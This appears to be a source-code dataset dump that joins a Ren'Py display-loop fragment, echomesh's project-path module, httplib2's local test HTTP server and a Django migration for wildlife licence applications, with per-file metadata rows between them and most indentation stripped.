renpy.display.screen.show_overlay_screens(suppress_overlay)
renpy.display.screen.prepare_screens()
self.roll_forward = roll_forward
self.show_mouse = show_mouse
suppress_transition = renpy.config.skipping or renpy.game.less_updates
self.suppress_transition = False
if suppress_transition:
self.ongoing_transition.clear()
self.transition_from.clear()
self.transition_time.clear()
else:
for k in self.transition:
if k not in self.old_scene:
continue
self.ongoing_transition[k] = self.transition[k]
self.transition_from[k] = self.old_scene[k]._in_current_store()
self.transition_time[k] = None
self.transition.clear()
if trans_pause:
if not self.ongoing_transition:
return False, None
if None not in self.ongoing_transition:
return False, None
if suppress_transition:
return False, None
if not self.old_scene:
return False, None
renpy.translation.check_language()
self.restart_interaction = False
self.mouse = mouse
start_time = get_time()
end_time = start_time
for i in renpy.config.interact_callbacks:
i()
self.set_window_caption()
renpy.display.im.cache.tick()
renpy.text.text.text_tick()
renpy.display.predict.reset()
renpy.display.layout.size_groups.clear()
renpy.display.screen.updated_screens.clear()
pygame.event.clear((pygame.MOUSEMOTION,
PERIODIC,
TIMEEVENT,
REDRAW))
self.post_time_event()
scene_lists = renpy.game.context().scene_lists
scene_lists.remove_hidden()
if not suppress_overlay:
self.compute_overlay()
root_widget = renpy.display.layout.MultiBox(layout='fixed')
root_widget.layers = { }
focus_roots = [ ]
if not suppress_underlay:
for i in renpy.config.underlay:
root_widget.add(i)
focus_roots.append(i)
if roll_forward is not None:
rfw = renpy.display.behavior.RollForward(roll_forward)
root_widget.add(rfw)
focus_roots.append(rfw)
scene = self.compute_scene(scene_lists)
renpy.display.tts.set_root(scene[None])
renpy.plog(1, "computed scene")
for w in scene.itervalues():
try:
renpy.display.predict.displayable(w)
except:
pass
renpy.plog(1, "final predict")
layers_root = renpy.display.layout.MultiBox(layout='fixed')
layers_root.layers = { }
def add_layer(where, layer):
scene_layer = scene[layer]
focus_roots.append(scene_layer)
if (self.ongoing_transition.get(layer, None) and
not suppress_transition):
trans = self.ongoing_transition[layer](
old_widget=self.transition_from[layer],
new_widget=scene_layer)
if not isinstance(trans, Displayable):
raise Exception("Expected transition to be a displayable, not a %r" % trans)
transition_time = self.transition_time.get(layer, None)
where.add(trans, transition_time, transition_time)
where.layers[layer] = trans
else:
where.layers[layer] = scene_layer
where.add(scene_layer)
for layer in renpy.config.layers:
add_layer(layers_root, layer)
if (self.ongoing_transition.get(None, None) and
not suppress_transition):
old_root = renpy.display.layout.MultiBox(layout='fixed')
old_root.layers = { }
for layer in renpy.config.layers:
d = self.transition_from[None].layers[layer]
old_root.layers[layer] = d
old_root.add(d)
trans = self.ongoing_transition[None](
old_widget=old_root,
new_widget=layers_root)
if not isinstance(trans, Displayable):
raise Exception("Expected transition to be a displayable, not a %r" % trans)
trans._show()
transition_time = self.transition_time.get(None, None)
root_widget.add(trans, transition_time, transition_time)
if trans_pause:
if renpy.store._dismiss_pause:
sb = renpy.display.behavior.SayBehavior()
else:
sb = renpy.display.behavior.SayBehavior(dismiss='dismiss_hard_pause')
root_widget.add(sb)
focus_roots.append(sb)
pb = renpy.display.behavior.PauseBehavior(trans.delay)
root_widget.add(pb, transition_time, transition_time)
focus_roots.append(pb)
else:
root_widget.add(layers_root)
for layer in renpy.config.top_layers:
add_layer(root_widget, layer)
for i in renpy.display.emulator.overlay:
root_widget.add(i)
del add_layer
self.prediction_coroutine = renpy.display.predict.prediction_coroutine(root_widget)
self.prediction_coroutine.send(None)
renpy.display.behavior.adj_registered.clear()
renpy.display.video.early_interact()
renpy.display.behavior.input_pre_per_interact()
root_widget.visit_all(lambda i : i.per_interact())
renpy.display.behavior.input_post_per_interact()
self.old_scene = scene
renpy.display.focus.before_interact(focus_roots)
# see it.
if self.restart_interaction:
return True, None
# Redraw the screen.
needs_redraw = True
# First pass through the while loop?
first_pass = True
# We don't yet know when the interaction began.
self.interact_time = None
self.did_autosave = False
old_timeout_time = None
old_redraw_time = None
rv = None
renpy.audio.audio.interact()
_redraw_in = 3600
video_frame_drawn = False
renpy.game.after_rollback = False
# How many frames have we shown so far?
frame = 0
can_block = False
# This try block is used to force cleanup even on termination
# caused by an exception propagating through this function.
try:
while rv is None:
renpy.plog(1, "start of interact while loop")
renpy.execution.not_infinite_loop(10)
# Check for a change in fullscreen preference.
if ((self.fullscreen != renpy.game.preferences.fullscreen) or
self.display_reset or (renpy.display.draw is None)):
self.set_mode()
needs_redraw = True
# Check for autoreload.
if renpy.loader.needs_autoreload:
renpy.loader.needs_autoreload = False
renpy.exports.reload_script()
for i in renpy.config.needs_redraw_callbacks:
if i():
needs_redraw = True
# Redraw the screen.
if (self.force_redraw or
((first_pass or not pygame.event.peek(ALL_EVENTS)) and
renpy.display.draw.should_redraw(needs_redraw, first_pass, can_block))):
self.force_redraw = False
renpy.display.render.process_redraws()
# If we have a movie, start showing it.
fullscreen_video = renpy.display.video.interact()
# Clean out the redraws, if we have to.
# renpy.display.render.kill_redraws()
self.text_rect = None
# Draw the screen.
self.frame_time = get_time()
renpy.audio.audio.advance_time() # Sets the time of all video frames.
self.draw_screen(root_widget, fullscreen_video, (not fullscreen_video) or video_frame_drawn)
if first_pass:
if not self.interact_time:
self.interact_time = max(self.frame_time, get_time() - self.frame_duration)
scene_lists.set_times(self.interact_time)
for k, v in self.transition_time.iteritems():
if v is None:
self.transition_time[k] = self.interact_time
renpy.display.render.adjust_render_cache_times(self.frame_time, self.interact_time)
frame += 1
renpy.config.frames += 1
# If profiling is enabled, report the profile time.
if renpy.config.profile or self.profile_once:
renpy.plog(0, "end frame")
renpy.performance.analyze()
renpy.performance.clear()
renpy.plog(0, "start frame")
self.profile_once = False
if first_pass and self.last_event and self.last_event.type in [ pygame.MOUSEBUTTONDOWN, pygame.MOUSEBUTTONUP, pygame.MOUSEMOTION ]:
x, y = renpy.display.draw.get_mouse_pos()
ev, x, y = renpy.display.emulator.emulator(self.last_event, x, y)
if self.ignore_touch:
x = -1
y = -1
if renpy.android and self.last_event.type == pygame.MOUSEBUTTONUP:
x = -1
y = -1
renpy.display.focus.mouse_handler(None, x, y, default=False)
needs_redraw = False
first_pass = False
pygame.time.set_timer(REDRAW, 0)
pygame.event.clear([REDRAW])
old_redraw_time = None
self.update_text_rect()
renpy.test.testexecution.execute()
# Move the mouse, if necessary.
if self.mouse_move is not None:
if not self.mouse_move.perform():
self.mouse_move = None
# Draw the mouse, if it needs drawing.
renpy.display.draw.update_mouse()
# See if we want to restart the interaction entirely.
if self.restart_interaction:
return True, None
# Determine if we need a redraw. (We want to run these
# functions, so we put them first to prevent short-circuiting.)
if renpy.display.video.frequent():
needs_redraw = True
video_frame_drawn = True
if renpy.display.render.check_redraws():
needs_redraw = True
# How many seconds until we timeout.
_timeout_in = 3600
# Handle the redraw timer.
redraw_time = renpy.display.render.redraw_time()
# We only need to set the REDRAW timer if we can block.
can_block = renpy.display.draw.can_block()
if self.maximum_framerate_time > get_time():
can_block = False
if (redraw_time is not None) and (not needs_redraw) and can_block:
if redraw_time != old_redraw_time:
time_left = redraw_time - get_time()
time_left = min(time_left, 3600)
_redraw_in = time_left
if time_left <= 0:
try:
pygame.event.post(self.redraw_event)
except:
pass
pygame.time.set_timer(REDRAW, 0)
else:
pygame.time.set_timer(REDRAW, max(int(time_left * 1000), 1))
old_redraw_time = redraw_time
else:
_redraw_in = 3600
pygame.time.set_timer(REDRAW, 0)
# Handle the timeout timer.
if not self.timeout_time:
pygame.time.set_timer(TIMEEVENT, 0)
else:
time_left = self.timeout_time - get_time()
time_left = min(time_left, 3600)
_timeout_in = time_left
if time_left <= 0:
self.timeout_time = None
pygame.time.set_timer(TIMEEVENT, 0)
self.post_time_event()
elif self.timeout_time != old_timeout_time:
# Always set to at least 1ms.
pygame.time.set_timer(TIMEEVENT, int(time_left * 1000 + 1))
old_timeout_time = self.timeout_time
if can_block or (frame >= renpy.config.idle_frame):
expensive = not ( needs_redraw or (_redraw_in < .2) or (_timeout_in < .2) or renpy.display.video.playing() )
self.idle_frame(can_block, expensive)
if needs_redraw or (not can_block) or self.mouse_move or renpy.display.video.playing():
renpy.plog(1, "pre peek")
ev = self.event_poll()
renpy.plog(1, "post peek {!r}", ev)
else:
renpy.plog(1, "pre wait")
ev = self.event_wait()
renpy.plog(1, "post wait {!r}", ev)
if ev.type == pygame.NOEVENT:
if can_block and (not needs_redraw) and (not self.prediction_coroutine) and (not self.mouse_move):
pygame.time.wait(1)
continue
# Recognize and ignore AltGr on Windows.
if ev.type == pygame.KEYDOWN:
if ev.key == pygame.K_LCTRL:
ev2 = self.event_peek()
if (ev2 is not None) and (ev2.type == pygame.KEYDOWN):
if ev2.key == pygame.K_RALT:
continue
# Check to see if the OS is asking us to suspend (on Android
# and iOS.)
if self.check_suspend(ev):
continue
# Try to merge an TIMEEVENT with other timeevents.
if ev.type == TIMEEVENT:
old_timeout_time = None
pygame.event.clear([TIMEEVENT])
# On Android, where we have multiple mouse buttons, we can
# merge a mouse down and mouse up event with its successor. This
# prevents us from getting overwhelmed with too many events on
# a multitouch screen.
if android and (ev.type == pygame.MOUSEBUTTONDOWN or ev.type == pygame.MOUSEBUTTONUP):
pygame.event.clear(ev.type)
# Handle redraw timeouts.
if ev.type == REDRAW:
pygame.event.clear([REDRAW])
old_redraw_time = None
continue
# Handle periodic events. This includes updating the mouse timers (and through the loop,
# the mouse itself), and the audio system periodic calls.
if ev.type == PERIODIC:
events = 1 + len(pygame.event.get([PERIODIC]))
self.ticks += events
for i in renpy.config.periodic_callbacks:
i()
renpy.audio.audio.periodic()
renpy.display.tts.periodic()
continue
# Handle quit specially for now.
if ev.type == pygame.QUIT:
self.quit_event()
continue
# Ignore KEY-events while text is being edited (usually with an IME).
if ev.type == pygame.TEXTEDITING:
if ev.text:
self.text_editing = ev
else:
self.text_editing = None
elif ev.type == pygame.TEXTINPUT:
self.text_editing = None
elif self.text_editing and ev.type in [ pygame.KEYDOWN, pygame.KEYUP ]:
continue
if ev.type == pygame.VIDEOEXPOSE:
# Needed to force the display to redraw after expose in
# the software renderer.
renpy.game.interface.full_redraw = True
renpy.game.interface.force_redraw = True
if isinstance(renpy.display.draw, renpy.display.swdraw.SWDraw):
renpy.display.draw.full_redraw = True
continue
# Handle videoresize.
if ev.type == pygame.VIDEORESIZE:
evs = pygame.event.get([pygame.VIDEORESIZE])
if len(evs):
ev = evs[-1]
# We seem to get a spurious event like this when leaving
# fullscreen mode on windows.
if ev.w < 256 or ev.h < 256:
continue
size = (ev.w // self.dpi_scale, ev.h // self.dpi_scale)
# Refresh fullscreen status (e.g. user pressed Esc. in browser)
main_window = pygame.display.get_window()
self.fullscreen = main_window is not None and bool(main_window.get_window_flags() & (pygame.WINDOW_FULLSCREEN_DESKTOP|pygame.WINDOW_FULLSCREEN))
renpy.game.preferences.fullscreen = self.fullscreen
if pygame.display.get_surface().get_size() != ev.size:
self.set_mode(size)
if not self.fullscreen:
self.last_resize = size
continue
# If we're ignoring touch events, and get a mouse up, stop
if self.ignore_touch and \
ev.type == pygame.MOUSEBUTTONUP and \
ev.button == 1:
self.ignore_touch = False
continue
if ev.type == pygame.MOUSEMOTION:
evs = pygame.event.get([pygame.MOUSEMOTION])
if len(evs):
ev = evs[-1]
if renpy.windows:
self.mouse_focused = True
if ev.type == pygame.MOUSEMOTION or \
ev.type == pygame.MOUSEBUTTONDOWN or \
ev.type == pygame.MOUSEBUTTONUP:
self.mouse_event_time = renpy.display.core.get_time()
if self.ignore_touch:
renpy.display.focus.mouse_handler(None, -1, -1, default=False)
if ev.type == pygame.ACTIVEEVENT:
if ev.state & 1:
if not ev.gain:
renpy.display.focus.clear_focus()
self.mouse_focused = ev.gain
if ev.state & 2:
self.keyboard_focused = ev.gain
if ev.state & 4:
if ev.gain:
self.restored()
else:
self.iconified()
pygame.key.set_mods(0)
x, y = renpy.display.draw.mouse_event(ev)
x, y = renpy.test.testmouse.get_mouse_pos(x, y)
ev, x, y = renpy.display.emulator.emulator(ev, x, y)
if ev is None:
continue
if not self.mouse_focused or self.ignore_touch:
x = -1
y = -1
ev = renpy.display.controller.event(ev)
if not ev:
continue
renpy.display.behavior.skipping(ev)
self.event_time = end_time = get_time()
try:
if self.touch:
renpy.display.gesture.recognizer.event(ev, x, y)
rv = renpy.display.focus.mouse_handler(ev, x, y)
if rv is None:
rv = root_widget.event(ev, x, y, 0)
if rv is None:
rv = renpy.display.focus.key_handler(ev)
if rv is not None:
break
if renpy.config.inspector:
if renpy.display.behavior.map_event(ev, "inspector"):
l = self.surftree.main_displayables_at_point(x, y, renpy.config.transient_layers + renpy.config.context_clear_layers + renpy.config.overlay_layers)
renpy.game.invoke_in_new_context(renpy.config.inspector, l)
elif renpy.display.behavior.map_event(ev, "full_inspector"):
l = self.surftree.main_displayables_at_point(x, y, renpy.config.layers)
renpy.game.invoke_in_new_context(renpy.config.inspector, l)
except IgnoreEvent:
if ev.type != TIMEEVENT:
self.post_time_event()
needs_redraw |= renpy.display.render.check_redraws()
if self.restart_interaction:
return True, None
if trans_pause and rv:
self.suppress_transition = True
# after this.
return False, rv
except EndInteraction as e:
return False, e.value
finally:
renpy.game.context().say_attributes = None
# Clean out the overlay layers.
for i in renpy.config.overlay_layers:
scene_lists.clear(i)
# Stop ongoing preloading.
renpy.display.im.cache.end_tick()
# We no longer disable periodic between interactions.
# pygame.time.set_timer(PERIODIC, 0)
pygame.time.set_timer(TIMEEVENT, 0)
pygame.time.set_timer(REDRAW, 0)
self.consider_gc()
renpy.game.context().runtime += end_time - start_time
# Restart the old interaction, which also causes a
# redraw if needed.
self.restart_interaction = True
renpy.plog(1, "end interact_core")
# print("It took", frames, "frames.")
def timeout(self, offset):
if offset < 0:
return
if self.timeout_time:
self.timeout_time = min(self.event_time + offset, self.timeout_time)
else:
self.timeout_time = self.event_time + offset
def finish_pending(self):
self.check_background_screenshot()
| true | true |
f72ecbc1483d9983735ec38c6681592f9d32e01b | 2,625 | py | Python | code/python/echomesh/base/Path.py | silky/echomesh | 2fe5a00a79c215b4aca4083e5252fcdcbd0507aa | [
"MIT"
] | 1 | 2019-06-27T11:34:13.000Z | 2019-06-27T11:34:13.000Z | code/python/echomesh/base/Path.py | silky/echomesh | 2fe5a00a79c215b4aca4083e5252fcdcbd0507aa | [
"MIT"
] | null | null | null | code/python/echomesh/base/Path.py | silky/echomesh | 2fe5a00a79c215b4aca4083e5252fcdcbd0507aa | [
"MIT"
] | null | null | null | from __future__ import absolute_import, division, print_function, unicode_literals
from echomesh.base import MakeEmptyProject
from echomesh.base import Platform
import getpass
import os
import os.path
import sys
ECHOMESH_EXTERNALS_OVERRIDE_SYSTEM_PACKAGES = True
# If this is True, you want Echomesh to use its own external packages in
# preference to any you might have installed in your system path.
CODE_PATH = os.path.abspath(sys.path[0])
EXTERNAL_CODE_PATH = os.path.join(CODE_PATH, 'external')
ECHOMESH_PATH = os.path.dirname(os.path.dirname(CODE_PATH))
BINARY_PATH = os.path.join(ECHOMESH_PATH, 'bin', Platform.PLATFORM)
PROJECT_PATH = None
COMMAND_PATH = None
ASSET_PATH = None
_REQUIRED_DIRECTORIES = 'asset', 'cache', 'command', 'log'
def _possible_project(path):
for d in _REQUIRED_DIRECTORIES:
if not os.path.exists(os.path.join(path, d)):
return False
return True
def set_project_path(project_path=None, show_error=True, prompt=True):
original_path = os.path.abspath(os.path.expanduser(project_path or os.curdir))
path = original_path
global PROJECT_PATH, COMMAND_PATH, ASSET_PATH
while not _possible_project(path):
p = os.path.dirname(path)
if p != path:
path = p
continue
if prompt:
if MakeEmptyProject.ask_to_make_empty_project(original_path):
path = original_path
break
else:
PROJECT_PATH = None
return False
if show_error:
print("\nYour path %s isn't in an echomesh project." % original_path)
print("Defaulting to the echomesh path %s." % ECHOMESH_PATH)
path = ECHOMESH_PATH
break
PROJECT_PATH = path
COMMAND_PATH = os.path.join(path, 'command')
ASSET_PATH = os.path.join(path, 'asset')
os.chdir(path)
return True
set_project_path()
def info():
return {
'Asset path': ASSET_PATH,
'Code path': CODE_PATH,
'Command path': COMMAND_PATH,
'External code path': EXTERNAL_CODE_PATH,
'Project path': PROJECT_PATH,
'echomesh path': ECHOMESH_PATH,
}
def fix_sys_path():
for path in EXTERNAL_CODE_PATH, BINARY_PATH:
if path not in sys.path:
if ECHOMESH_EXTERNALS_OVERRIDE_SYSTEM_PACKAGES:
sys.path.insert(1, path)
else:
sys.path.append(path)
_HOME_VARIABLE_FIXED = False
# HACK!
def fix_home_directory_environment_variable():
if Platform.PLATFORM == Platform.DEBIAN:
global _HOME_VARIABLE_FIXED
if not _HOME_VARIABLE_FIXED:
# If running as root, export user pi's home directory as $HOME.
if getpass.getuser() == 'root':
os.environ['HOME'] = '/home/pi'
_HOME_VARIABLE_FIXED = True
| 28.846154 | 82 | 0.719238 | from __future__ import absolute_import, division, print_function, unicode_literals
from echomesh.base import MakeEmptyProject
from echomesh.base import Platform
import getpass
import os
import os.path
import sys
ECHOMESH_EXTERNALS_OVERRIDE_SYSTEM_PACKAGES = True
CODE_PATH = os.path.abspath(sys.path[0])
EXTERNAL_CODE_PATH = os.path.join(CODE_PATH, 'external')
ECHOMESH_PATH = os.path.dirname(os.path.dirname(CODE_PATH))
BINARY_PATH = os.path.join(ECHOMESH_PATH, 'bin', Platform.PLATFORM)
PROJECT_PATH = None
COMMAND_PATH = None
ASSET_PATH = None
_REQUIRED_DIRECTORIES = 'asset', 'cache', 'command', 'log'
def _possible_project(path):
for d in _REQUIRED_DIRECTORIES:
if not os.path.exists(os.path.join(path, d)):
return False
return True
def set_project_path(project_path=None, show_error=True, prompt=True):
original_path = os.path.abspath(os.path.expanduser(project_path or os.curdir))
path = original_path
global PROJECT_PATH, COMMAND_PATH, ASSET_PATH
while not _possible_project(path):
p = os.path.dirname(path)
if p != path:
path = p
continue
if prompt:
if MakeEmptyProject.ask_to_make_empty_project(original_path):
path = original_path
break
else:
PROJECT_PATH = None
return False
if show_error:
print("\nYour path %s isn't in an echomesh project." % original_path)
print("Defaulting to the echomesh path %s." % ECHOMESH_PATH)
path = ECHOMESH_PATH
break
PROJECT_PATH = path
COMMAND_PATH = os.path.join(path, 'command')
ASSET_PATH = os.path.join(path, 'asset')
os.chdir(path)
return True
set_project_path()
def info():
return {
'Asset path': ASSET_PATH,
'Code path': CODE_PATH,
'Command path': COMMAND_PATH,
'External code path': EXTERNAL_CODE_PATH,
'Project path': PROJECT_PATH,
'echomesh path': ECHOMESH_PATH,
}
def fix_sys_path():
for path in EXTERNAL_CODE_PATH, BINARY_PATH:
if path not in sys.path:
if ECHOMESH_EXTERNALS_OVERRIDE_SYSTEM_PACKAGES:
sys.path.insert(1, path)
else:
sys.path.append(path)
_HOME_VARIABLE_FIXED = False
# HACK!
def fix_home_directory_environment_variable():
if Platform.PLATFORM == Platform.DEBIAN:
global _HOME_VARIABLE_FIXED
if not _HOME_VARIABLE_FIXED:
# If running as root, export user pi's home directory as $HOME.
if getpass.getuser() == 'root':
os.environ['HOME'] = '/home/pi'
_HOME_VARIABLE_FIXED = True
| true | true |
f72eccac332916dcfea55705b3733758b36e79f1 | 3,779 | py | Python | third_party/gsutil/third_party/httplib2/python2/httplib2/test/miniserver.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 2,151 | 2020-04-18T07:31:17.000Z | 2022-03-31T08:39:18.000Z | third_party/gsutil/third_party/httplib2/python2/httplib2/test/miniserver.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 4,640 | 2015-07-08T16:19:08.000Z | 2019-12-02T15:01:27.000Z | third_party/gsutil/third_party/httplib2/python2/httplib2/test/miniserver.py | tingshao/catapult | a8fe19e0c492472a8ed5710be9077e24cc517c5c | [
"BSD-3-Clause"
] | 698 | 2015-06-02T19:18:35.000Z | 2022-03-29T16:57:15.000Z | import logging
import os
import select
import SimpleHTTPServer
import socket
import SocketServer
import threading
HERE = os.path.dirname(__file__)
logger = logging.getLogger(__name__)
class ThisDirHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def translate_path(self, path):
path = path.split('?', 1)[0].split('#', 1)[0]
return os.path.join(HERE, *filter(None, path.split('/')))
def log_message(self, s, *args):
# output via logging so nose can catch it
logger.info(s, *args)
class ShutdownServer(SocketServer.TCPServer):
"""Mixin that allows serve_forever to be shut down.
The methods in this mixin are backported from SocketServer.py in the Python
2.6.4 standard library. The mixin is unnecessary in 2.6 and later, when
BaseServer supports the shutdown method directly.
"""
def __init__(self, use_tls, *args, **kwargs):
self.__use_tls = use_tls
SocketServer.TCPServer.__init__(self, *args, **kwargs)
self.__is_shut_down = threading.Event()
self.__serving = False
def server_bind(self):
SocketServer.TCPServer.server_bind(self)
if self.__use_tls:
import ssl
self.socket = ssl.wrap_socket(self.socket,
os.path.join(os.path.dirname(__file__), 'server.key'),
os.path.join(os.path.dirname(__file__), 'server.pem'),
True
)
def serve_forever(self, poll_interval=0.1):
"""Handle one request at a time until shutdown.
Polls for shutdown every poll_interval seconds. Ignores
self.timeout. If you need to do periodic tasks, do them in
another thread.
"""
self.__serving = True
self.__is_shut_down.clear()
while self.__serving:
r, w, e = select.select([self.socket], [], [], poll_interval)
if r:
self._handle_request_noblock()
self.__is_shut_down.set()
def shutdown(self):
"""Stops the serve_forever loop.
Blocks until the loop has finished. This must be called while
serve_forever() is running in another thread, or it will deadlock.
"""
self.__serving = False
self.__is_shut_down.wait()
def handle_request(self):
"""Handle one request, possibly blocking.
Respects self.timeout.
"""
# Support people who used socket.settimeout() to escape
# handle_request before self.timeout was available.
timeout = self.socket.gettimeout()
if timeout is None:
timeout = self.timeout
elif self.timeout is not None:
timeout = min(timeout, self.timeout)
fd_sets = select.select([self], [], [], timeout)
if not fd_sets[0]:
self.handle_timeout()
return
self._handle_request_noblock()
def _handle_request_noblock(self):
"""Handle one request, without blocking.
I assume that select.select has returned that the socket is
readable before this function was called, so there should be
no risk of blocking in get_request().
"""
try:
request, client_address = self.get_request()
except socket.error:
return
if self.verify_request(request, client_address):
try:
self.process_request(request, client_address)
except:
self.handle_error(request, client_address)
self.close_request(request)
def start_server(handler, use_tls=False):
httpd = ShutdownServer(use_tls, ("", 0), handler)
threading.Thread(target=httpd.serve_forever).start()
_, port = httpd.socket.getsockname()
return httpd, port
| 33.149123 | 79 | 0.629796 | import logging
import os
import select
import SimpleHTTPServer
import socket
import SocketServer
import threading
HERE = os.path.dirname(__file__)
logger = logging.getLogger(__name__)
class ThisDirHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def translate_path(self, path):
path = path.split('?', 1)[0].split('#', 1)[0]
return os.path.join(HERE, *filter(None, path.split('/')))
def log_message(self, s, *args):
logger.info(s, *args)
class ShutdownServer(SocketServer.TCPServer):
def __init__(self, use_tls, *args, **kwargs):
self.__use_tls = use_tls
SocketServer.TCPServer.__init__(self, *args, **kwargs)
self.__is_shut_down = threading.Event()
self.__serving = False
def server_bind(self):
SocketServer.TCPServer.server_bind(self)
if self.__use_tls:
import ssl
self.socket = ssl.wrap_socket(self.socket,
os.path.join(os.path.dirname(__file__), 'server.key'),
os.path.join(os.path.dirname(__file__), 'server.pem'),
True
)
def serve_forever(self, poll_interval=0.1):
self.__serving = True
self.__is_shut_down.clear()
while self.__serving:
r, w, e = select.select([self.socket], [], [], poll_interval)
if r:
self._handle_request_noblock()
self.__is_shut_down.set()
def shutdown(self):
self.__serving = False
self.__is_shut_down.wait()
def handle_request(self):
timeout = self.socket.gettimeout()
if timeout is None:
timeout = self.timeout
elif self.timeout is not None:
timeout = min(timeout, self.timeout)
fd_sets = select.select([self], [], [], timeout)
if not fd_sets[0]:
self.handle_timeout()
return
self._handle_request_noblock()
def _handle_request_noblock(self):
try:
request, client_address = self.get_request()
except socket.error:
return
if self.verify_request(request, client_address):
try:
self.process_request(request, client_address)
except:
self.handle_error(request, client_address)
self.close_request(request)
def start_server(handler, use_tls=False):
httpd = ShutdownServer(use_tls, ("", 0), handler)
threading.Thread(target=httpd.serve_forever).start()
_, port = httpd.socket.getsockname()
return httpd, port
| true | true |
f72ece2577e1c7ce79389ad64b2bed43d07b14b5 | 9,235 | py | Python | wildlifelicensing/apps/applications/migrations/0001_initial.py | jawaidm/wildlifelicensing | 87e8e9ab163e0d7bbb0c7a654a13ce8a4d8fcf82 | [
"Apache-2.0"
] | null | null | null | wildlifelicensing/apps/applications/migrations/0001_initial.py | jawaidm/wildlifelicensing | 87e8e9ab163e0d7bbb0c7a654a13ce8a4d8fcf82 | [
"Apache-2.0"
] | 11 | 2019-03-19T02:03:11.000Z | 2019-05-31T07:20:59.000Z | wildlifelicensing/apps/applications/migrations/0001_initial.py | jawaidm/wildlifelicensing | 87e8e9ab163e0d7bbb0c7a654a13ce8a4d8fcf82 | [
"Apache-2.0"
] | 2 | 2020-08-10T10:17:10.000Z | 2021-10-31T23:20:53.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-06-10 08:47
from __future__ import unicode_literals
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the ``wl_applications`` app.

    Creates the Application model, its conditions, the log-entry base
    model and the log-entry subclasses (amendment/ID/returns requests,
    assessments, custom and email log entries).

    Auto-generated by Django 1.9.5 on 2016-06-10 — edit with care, as
    manual changes here must stay consistent with the model definitions.
    """
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Application',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('customer_status', models.CharField(choices=[('draft', 'Draft'), ('under_review', 'Under Review'), ('id_required', 'Identification Required'), ('returns_required', 'Returns Completion Required'), ('amendment_required', 'Amendment Required'), ('id_and_amendment_required', 'Identification/Amendments Required'), ('id_and_returns_required', 'Identification/Returns Required'), ('returns_and_amendment_required', 'Returns/Amendments Required'), ('id_and_returns_and_amendment_required', 'Identification/Returns/Amendments Required'), ('approved', 'Approved'), ('declined', 'Declined')], default='draft', max_length=40, verbose_name='Customer Status')),
                ('data', django.contrib.postgres.fields.jsonb.JSONField()),
                ('correctness_disclaimer', models.BooleanField(default=False)),
                ('further_information_disclaimer', models.BooleanField(default=False)),
                ('lodgement_number', models.CharField(blank=True, default='', max_length=9)),
                ('lodgement_sequence', models.IntegerField(blank=True, default=0)),
                ('lodgement_date', models.DateField(blank=True, null=True)),
                ('processing_status', models.CharField(choices=[('draft', 'Draft'), ('new', 'New'), ('renewal', 'Renewal'), ('ready_for_action', 'Ready for Action'), ('awaiting_applicant_response', 'Awaiting Applicant Response'), ('awaiting_assessor_response', 'Awaiting Assessor Response'), ('awaiting_responses', 'Awaiting Responses'), ('ready_for_conditions', 'Ready for Conditions'), ('ready_to_issue', 'Ready to Issue'), ('issued', 'Issued'), ('declined', 'Declined')], default='draft', max_length=30, verbose_name='Processing Status')),
                ('id_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('awaiting_update', 'Awaiting Update'), ('updated', 'Updated'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Identification Check Status')),
                ('returns_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('awaiting_returns', 'Awaiting Returns'), ('completed', 'Completed'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Return Check Status')),
                ('character_check_status', models.CharField(choices=[('not_checked', 'Not Checked'), ('accepted', 'Accepted')], default='not_checked', max_length=30, verbose_name='Character Check Status')),
                ('review_status', models.CharField(choices=[('not_reviewed', 'Not Reviewed'), ('awaiting_amendments', 'Awaiting Amendments'), ('amended', 'Amended'), ('accepted', 'Accepted')], default='not_reviewed', max_length=30, verbose_name='Review Status')),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='ApplicationCondition',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('order', models.IntegerField()),
            ],
        ),
        migrations.CreateModel(
            name='ApplicationLogEntry',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('text', models.TextField(blank=True)),
                ('created', models.DateField(auto_now_add=True)),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='AssessmentCondition',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('order', models.IntegerField()),
                ('acceptance_status', models.CharField(choices=[('not_specified', 'Not Specified'), ('accepted', 'Accepted'), ('declined', 'Declined')], default='not_specified', max_length=20, verbose_name='Acceptance Status')),
            ],
        ),
        migrations.CreateModel(
            name='AmendmentRequest',
            fields=[
                ('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
                ('status', models.CharField(choices=[('requested', 'Requested'), ('amended', 'Amended')], default='requested', max_length=30, verbose_name='Status')),
                ('reason', models.CharField(choices=[('insufficient_detail', 'The information provided was insufficient'), ('missing_information', 'There was missing information'), ('other', 'Other')], default='insufficient_detail', max_length=30, verbose_name='Reason')),
            ],
            options={
                'abstract': False,
            },
            bases=('wl_applications.applicationlogentry',),
        ),
        migrations.CreateModel(
            name='Assessment',
            fields=[
                ('applicationlogentry_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wl_applications.ApplicationLogEntry')),
                ('status', models.CharField(choices=[('awaiting_assessment', 'Awaiting Assessment'), ('assessed', 'Assessed')], default='awaiting_assessment', max_length=20, verbose_name='Status')),
                ('comment', models.TextField(blank=True)),
                ('purpose', models.TextField(blank=True)),
            ],
            options={
                'abstract': False,
            },
